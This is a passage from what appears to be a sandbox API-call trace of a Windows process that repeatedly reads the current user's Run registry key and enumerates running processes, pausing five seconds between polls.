ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0182.896] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0182.896] NtClose (Handle=0x154) returned 0x0 [0182.896] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0182.897] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0182.897] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0182.898] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0182.898] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0182.901] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0182.902] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0182.910] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0182.910] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0182.911] NtClose (Handle=0x154) returned 0x0 [0182.911] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0182.911] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0182.912] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0182.912] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0182.912] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0182.914] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0182.915] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0182.927] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0182.927] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0182.927] NtClose (Handle=0x154) returned 0x0 [0182.927] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0182.928] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0182.928] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0182.928] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0182.929] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0182.931] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0182.931] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0182.941] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0182.942] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0182.942] NtClose (Handle=0x154) returned 0x0 [0182.942] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0182.942] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0182.943] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0182.943] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0182.943] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0182.945] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0182.946] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0182.957] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0182.957] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0182.957] NtClose (Handle=0x154) returned 0x0 [0182.957] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0182.958] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0182.958] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0182.959] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0182.959] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0182.961] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0182.961] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0182.973] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0182.973] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0182.973] NtClose (Handle=0x154) returned 0x0 [0182.973] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0182.973] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0182.974] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0182.974] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0182.974] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0182.976] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0182.976] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0182.990] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0182.990] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0182.990] NtClose (Handle=0x154) returned 0x0 [0182.990] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0182.990] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0182.991] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0182.991] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0182.991] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0182.994] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0182.994] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0183.006] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0183.006] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0183.006] NtClose (Handle=0x154) returned 0x0 [0183.006] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0183.007] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0183.007] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0183.007] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0183.008] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0183.010] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0183.010] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0183.020] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0183.020] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0183.020] NtClose (Handle=0x154) returned 0x0 [0183.020] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0183.020] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0183.021] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0183.021] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0183.021] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0183.024] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0183.024] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0183.036] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0183.036] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0183.036] NtClose (Handle=0x154) returned 0x0 [0183.036] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0183.036] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0183.037] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0183.037] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0183.037] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0183.039] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0183.039] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0183.051] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0183.051] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0183.051] NtClose (Handle=0x154) returned 0x0 [0183.051] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0183.051] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0183.052] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0183.052] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0183.052] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0183.054] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0183.055] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0183.066] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0183.066] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0183.066] NtClose (Handle=0x154) returned 0x0 [0183.067] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0183.067] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0183.067] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0183.068] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0183.068] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0183.070] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0183.070] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0183.082] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0183.082] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0183.082] NtClose (Handle=0x154) returned 0x0 [0183.082] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0183.082] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0183.083] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0183.083] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0183.083] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0183.085] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0183.086] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0183.098] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0183.098] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0183.098] NtClose (Handle=0x154) returned 0x0 [0183.098] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0183.098] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, 